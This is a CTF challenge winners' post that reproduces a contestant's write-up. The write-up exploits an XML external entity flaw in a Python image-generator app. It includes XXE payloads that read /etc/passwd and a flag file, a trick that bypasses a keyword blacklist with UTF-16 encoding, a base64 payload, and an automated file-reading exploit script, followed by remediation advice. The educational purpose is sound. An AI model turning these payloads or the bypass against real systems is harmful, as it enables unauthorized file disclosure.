Dojo challenge #34 winners!

August 5, 2024

The 34th Dojo Challenge, AI Image Generator, invited participants to exploit an XML external entity (XXE) injection (CWE-611) vulnerability and read a file containing the challenge flag.

We are delighted to announce the winners of Dojo Challenge #34 below.

💡 Want to create your own monthly Dojo challenge? Send us a message on Twitter!

3 BEST REPORT WRITE-UPS

Congrats to greenhat, __init__ and rafffff for the best write-ups 🥳

The swag is on its way! 🎁

Subscribe to our Twitter and/or LinkedIn feeds to be notified of upcoming challenges.

Read on to find out how one of the winners managed to solve the challenge.

The challenge

We asked you to produce a qualified report explaining the logic allowing exploitation, as set out by the challenge.

This write-up serves two purposes:

  • To ensure contestants actually solved the challenge themselves rather than copy-pasting the answer from elsewhere.
  • To determine contestants' ability to properly describe a vulnerability and its vectors within a professionally written report. This gives us invaluable hints on your unique talent as a bug hunter.

OVERALL BEST WRITE-UP

We want to thank everyone who participated and submitted a report for the Dojo challenge. Many other high-quality reports were submitted alongside those of the three winners. 😉

Below is the best write-up overall. Thanks again for all your submissions and thanks for playing!

rafffff's Write-Up

---------- START OF rafffff's REPORT ----------

Description

An XXE (XML External Entity) vulnerability occurs when an application parses attacker-controlled XML with a parser that resolves external entities, allowing an attacker to include insecure external entities in an XML document.

This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

Vulnerable applications may include web services, applications that use XML documents for data processing, or any workflow that improperly controls XML data.

Exploitation

We are presented with a web application that takes a prompt as input for an AI image generator. We can either give it a theme directly or supply a base64-encoded XML file.

Code analysis - Part 1

When we analyze the source code, we notice the promptFromXML function, which we're going to focus on:

def promptFromXML(s:str):
    dataBytes = base64.b64decode(s)

    if (dataBytes[:2] != b'\xff\xfe' and dataBytes[:2] != b'\xfe\xff'):
        #Allow parsing for casual svg
        if any(x in dataBytes.lower() for x in [b'file://', b'tmp', b'flag.txt', b'system', b'public', b'entity']):
            return 'BLOCKED'

    data = dataBytes.decode(detect_encoding(dataBytes))

    handler = XMLContentHandler()
    parser = xml.sax.make_parser()

    parser.setFeature(xml.sax.handler.feature_external_ges, True)
    parser.setContentHandler(handler)

    parser.parse(io.StringIO(data))

    return handler.get_text()

One line instantly catches our attention:

parser.setFeature(xml.sax.handler.feature_external_ges, True)

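Indeed, this line of Python code configures the XML parser to process external general entities (entities declared in the DTD (Document Type Definition) whose replacement text is not written in the document itself but loaded from an external resource named by a SYSTEM or PUBLIC identifier). Since Python 3.7.1, the SAX parser no longer processes these entities by default, so the application enables them explicitly.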

  • parser: is an instance of an XML parser.
  • setFeature: is a method used to enable or disable certain features of the XML parser.
  • xml.sax.handler.feature_external_ges: is a predefined constant in the xml.sax.handler module that specifies the feature to allow external general entities.
  • True: enables this feature.

This confirms that an XXE attack is possible on the web application if we manage to craft a malicious XML file.
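As a minimal sketch of what this feature changes, the snippet below parses the same document twice, once with the feature enabled and once with it disabled. The TextCollector handler, the parse_with helper and the temporary file are hypothetical stand-ins for the challenge's XMLContentHandler and flag file, which are not shown in full in the source code.

```python
import io
import os
import pathlib
import tempfile
import xml.sax
import xml.sax.handler


class TextCollector(xml.sax.handler.ContentHandler):
    """Hypothetical stand-in for the challenge's XMLContentHandler."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)

    def get_text(self):
        return "".join(self.chunks)


def parse_with(document: str, external_ges: bool) -> str:
    """Parse the document and return its text, toggling external entities."""
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, external_ges)
    parser.setContentHandler(handler)
    parser.parse(io.StringIO(document))
    return handler.get_text()


# Throwaway file that plays the role of a sensitive file on the server.
fd, secret_path = tempfile.mkstemp(suffix=".txt")
with os.fdopen(fd, "w") as f:
    f.write("DEMO-SECRET")

file_uri = pathlib.Path(secret_path).as_uri()
document = (
    '<?xml version="1.0"?>'
    f'<!DOCTYPE root [<!ENTITY test SYSTEM "{file_uri}">]>'
    "<root>&test;</root>"
)

leaked = parse_with(document, external_ges=True)
ignored = parse_with(document, external_ges=False)
os.remove(secret_path)

print(repr(leaked))   # contains the file content
print(repr(ignored))  # the entity is not expanded
```

With the feature enabled, the parser fetches the resource behind the SYSTEM identifier and hands its content to the handler as ordinary character data, which is why the file ends up in the application's output.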

Code analysis - Part 2

if (dataBytes[:2] != b'\xff\xfe' and dataBytes[:2] != b'\xfe\xff'):

The first condition, if (dataBytes[:2] != b'\xff\xfe' and dataBytes[:2] != b'\xfe\xff'):, checks whether the data starts with a Byte Order Mark (BOM) for UTF-16 little-endian (b'\xff\xfe') or UTF-16 big-endian (b'\xfe\xff'). Here is what this check does:

  1. Detection of UTF-16 Encoding: BOM signatures are used to indicate the encoding of a text file, especially for UTF-16. b'\xff\xfe' signifies that the text is encoded in UTF-16 little-endian, while b'\xfe\xff' signifies that the text is encoded in UTF-16 big-endian.
  2. Gating the blacklist: The keyword check nested under this condition only runs when neither BOM is present. According to the code comment, this exception is meant to allow the parsing of ordinary SVG files.
  3. No rejection of UTF-16 data: Data that starts with a UTF-16 BOM is not refused. It skips the keyword check and goes straight to decoding and parsing.

As a result, the code lacks any handling for data that contains a UTF-16 BOM: such input reaches the parser unfiltered. It would be prudent to add an else block to handle this situation, for instance by returning an error, or to decode the data first and apply the same checks to the decoded text.
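The effect of this first condition can be sketched in isolation. The helper name blacklist_is_applied is hypothetical; it only mirrors the comparison made in promptFromXML and is not part of the challenge code.

```python
import codecs

# The two signatures tested by the challenge code: b'\xff\xfe' and b'\xfe\xff'.
UTF16_BOMS = (codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)


def blacklist_is_applied(data_bytes: bytes) -> bool:
    """Return True when promptFromXML would run its keyword check,
    i.e. when the data does not start with a UTF-16 BOM."""
    return data_bytes[:2] not in UTF16_BOMS


payload = "<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>"

as_utf8 = payload.encode("utf-8")
# Python's "utf-16" codec prepends a BOM in the platform's byte order.
as_utf16_with_bom = payload.encode("utf-16")

print(blacklist_is_applied(as_utf8))            # True
print(blacklist_is_applied(as_utf16_with_bom))  # False
```

In other words, any input that starts with one of the two BOMs is never compared against the keyword list at all.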

Code analysis - Part 3

if any(x in dataBytes.lower() for x in [b'file://', b'tmp', b'flag.txt', b'system', b'public', b'entity']):
  return 'BLOCKED'

The second condition, if any(x in dataBytes.lower() for x in [b'file://', b'tmp', b'flag.txt', b'system', b'public', b'entity']):, checks for the presence of certain substrings within the raw bytes, which are lowercased but not yet decoded. Here's the purpose of this verification:

  1. Detection of Potentially Dangerous Content: This condition searches for specific keywords and substrings that could indicate dangerous or sensitive content. For example:
    • b'file://' is the URI scheme used to read local files through an external entity.
    • b'tmp' and b'flag.txt' refer to the directory and the file that hold the flag.
    • b'system' and b'public' match the SYSTEM and PUBLIC keywords that introduce an external identifier in an entity declaration.
    • b'entity' matches the <!ENTITY declaration itself, which every XML External Entity (XXE) payload needs.
  2. Preventing Security Risks: By detecting these potentially dangerous substrings, the code can prevent the processing of malicious data that could lead to security vulnerabilities. For instance, an XXE attack might involve using external entities to access sensitive files, and this condition helps block such attempts.
  3. Early Detection of Malicious Input: This check acts as an early warning system for malicious input, allowing the function to return 'BLOCKED' immediately if any of these keywords are found. This prevents further processing of potentially harmful data, reducing the risk of security breaches.

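Overall, this condition is meant to enhance the security of the application by detecting and blocking potentially harmful content before it can be processed and cause damage. However, because it compares raw bytes, it only recognizes these keywords when they appear as contiguous ASCII bytes, as they do in UTF-8.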
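To see how this check behaves on different encodings, here is a small sketch that reproduces the substring test on raw bytes. The names BLACKLIST and is_blocked are hypothetical; the keyword list is copied from the challenge code.

```python
BLACKLIST = [b"file://", b"tmp", b"flag.txt", b"system", b"public", b"entity"]


def is_blocked(data_bytes: bytes) -> bool:
    """Same substring test as the challenge code, applied to raw bytes."""
    lowered = data_bytes.lower()
    return any(keyword in lowered for keyword in BLACKLIST)


payload = "<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///tmp/flag.txt'>]>"

utf8_bytes = payload.encode("utf-8")
# UTF-16LE without a BOM: every ASCII byte is followed by a NUL byte.
utf16le_bytes = payload.encode("utf-16le")

print(is_blocked(utf8_bytes))     # True
print(is_blocked(utf16le_bytes))  # False
print(utf16le_bytes[:8])          # b'<\x00!\x00D\x00O\x00'
```

The NUL byte inserted after each character breaks every keyword apart, so the same payload passes the check once it is encoded as UTF-16, even without a BOM.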

Code analysis - Conclusion

From our analysis, we note that:

  • The parser resolves external general entities.
  • Encoding the payload as UTF-16 (little-endian or big-endian) bypasses the blacklist protection.

To exploit the vulnerability, we can then take a classic XXE payload:

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>

We can use any program to encode it as UTF-16 little-endian (or big-endian), then encode the result as base64 and feed it to the application.

To do so, we used the iconv and base64 binaries on the XML file containing our payload:

iconv -t utf-16le xxe.xml | base64 -w 0
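For readers without iconv at hand, the same transformation can be sketched in Python. This assumes the payload is held in a string rather than in the xxe.xml file, so the output has no trailing newline, unlike a file saved by a text editor.

```python
import base64

payload = (
    '<?xml version="1.0"?>'
    "<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>"
    "<root>&test;</root>"
)

# Equivalent of: iconv -t utf-16le | base64 -w 0
encoded = base64.b64encode(payload.encode("utf-16le")).decode("ascii")
print(encoded)

# Round trip: the text recovered once the input is decoded as UTF-16LE.
decoded = base64.b64decode(encoded).decode("utf-16le")
print(decoded == payload)  # True
```

The resulting string starts with PAA/AHgAbQBs, which is the base64 form of the first characters of the XML declaration encoded as UTF-16LE.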

Copy and paste the result into the prompt of the application to verify the exploitation.

Indeed, the content of the /etc/passwd file is displayed.

PoC

To retrieve the content of the flag.txt file, we use the following XML payload:

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///tmp/flag.txt'>]><root>&test;</root>

Convert it with iconv and base64 to get the following payload:

PAA/AHgAbQBsACAAdgBlAHIAcwBpAG8AbgA9ACIAMQAuADAAIgA/AD4APAAhAEQATwBDAFQAWQBQAEUAIAByAG8AbwB0ACAAWwA8ACEARQBOAFQASQBUAFkAIAB0AGUAcwB0ACAAUwBZAFMAVABFAE0AIAAnAGYAaQBsAGUAOgAvAC8ALwB0AG0AcAAvAGYAbABhAGcALgB0AHgAdAAnAD4AXQA+ADwAcgBvAG8AdAA+ACYAdABlAHMAdAA7ADwALwByAG8AbwB0AD4ACgA=

Retrieving the flag: FLAG{Y0u_Pwniied_Th3_AI!!}

To automate the task, I wrote the following script:

from base64 import b64encode
from cmd import Cmd
import re

import requests

url = "https://dojo-yeswehack.com/api/challenges/c95c29c0-cf7c-4140-828e-76c483ba1f03"
cookies = {
    "jwt": ""  # !!! CONNECT TO THE APP, AND INSERT YOUR JWT !!!
}
# PLACEHOLDER is replaced with the absolute path of the file to read.
base_payload = """<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file://PLACEHOLDER'>]><root>&test;</root>"""

class Terminal(Cmd):
    prompt = "[YWH - dojo 34] Filepath > "

    def do_exit(self, line):
        print("Bye !")
        return True

    def default(self, line):
        # Any input that is not a known command is treated as a file path.
        payload = base_payload.replace("PLACEHOLDER", line)
        # UTF-16LE puts a NUL byte after each ASCII character,
        # which hides the keywords from the byte-level blacklist.
        payload16LE = payload.encode("utf-16le")
        payload16LEB64 = b64encode(payload16LE).decode("ascii")

        final = {"input": payload16LEB64}
        r = requests.post(url, cookies=cookies, data=final)
        if r.status_code == 200:
            # Extract the content of the first <p> element of the response.
            pattern = re.compile(r'<p>(.*?)</p>', re.DOTALL)
            match = pattern.search(r.text)
            if match:
                out = match.group(1).encode().decode('unicode_escape')
                if "Your prompt to get this fancy" not in out:
                    print(out)
                else:
                    print("File doesn't exist or is unreadable ...")
        else:
            print("Error: something went wrong with the request ...")

if __name__ == "__main__":
    terminal = Terminal()
    terminal.cmdloop()

Risk

XXE (XML External Entity) vulnerabilities pose significant security risks to systems. By exploiting these vulnerabilities, attackers can gain access to sensitive files on the server, execute remote code, or retrieve confidential data.
This can lead to privacy breaches, data integrity violations, or even complete compromise of the system. Vulnerable applications often include web services and other applications that handle XML data without properly controlling it, exposing these systems to significant risks of exploitation by malicious actors.

Remediation

To protect against XXE (XML External Entity) vulnerabilities, we recommend following these measures:

  • Disable external entities: Configure XML processors to disable support for insecure external entities.
  • Use secure XML libraries: Utilize secure XML libraries that implement protections against XXE attacks.
  • Validate and filter user inputs: Rigorously validate and filter all incoming XML data to eliminate unauthorized external entities and potentially malicious data.
  • Update libraries and frameworks: Ensure all XML libraries used are up-to-date with the latest security patches to mitigate risks.
  • Awareness and training: Educate developers and security teams on best practices for securing XML applications and web services.

By implementing these measures, you can effectively reduce the risks of XXE vulnerabilities in your applications and systems.
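As an illustration of the first measure, here is a minimal sketch of a hardened parsing function using only the standard library. The names prompt_from_xml_hardened and TextCollector are hypothetical, and the temporary file only simulates a sensitive file; this is one possible way to apply the recommendation, not the fix deployed by the challenge authors.

```python
import base64
import io
import os
import pathlib
import tempfile
import xml.sax
import xml.sax.handler


class TextCollector(xml.sax.handler.ContentHandler):
    """Hypothetical handler that gathers character data."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)

    def get_text(self):
        return "".join(self.chunks)


def prompt_from_xml_hardened(b64_input: str) -> str:
    raw = base64.b64decode(b64_input, validate=True)
    handler = TextCollector()
    parser = xml.sax.make_parser()
    # Refuse external general entities explicitly instead of relying on
    # a keyword blacklist or on the parser's defaults.
    parser.setFeature(xml.sax.handler.feature_external_ges, False)
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(raw))
    return handler.get_text()


# A benign prompt is still parsed normally.
benign = base64.b64encode(b"<root>a cat</root>").decode("ascii")
benign_text = prompt_from_xml_hardened(benign)

# An XXE attempt against a throwaway file no longer discloses its content.
fd, secret_path = tempfile.mkstemp(suffix=".txt")
with os.fdopen(fd, "w") as f:
    f.write("DEMO-SECRET")
file_uri = pathlib.Path(secret_path).as_uri()
attack = (
    '<?xml version="1.0"?>'
    f'<!DOCTYPE root [<!ENTITY test SYSTEM "{file_uri}">]>'
    "<root>&test;</root>"
)
attack_text = prompt_from_xml_hardened(
    base64.b64encode(attack.encode("utf-8")).decode("ascii")
)
os.remove(secret_path)

print(repr(benign_text))
print("DEMO-SECRET" in attack_text)  # False
```

Disabling the feature at the parser level works regardless of the encoding of the input, which is what the byte-level blacklist failed to achieve.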

References

  • OWASP - XML External Entity (XXE) Processing: https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
  • Python Docs - Vulnerabilities affecting the SAX parser: https://docs.python.org/3/library/xml.html#xml-vulnerabilities

---------- END OF rafffff's REPORT ----------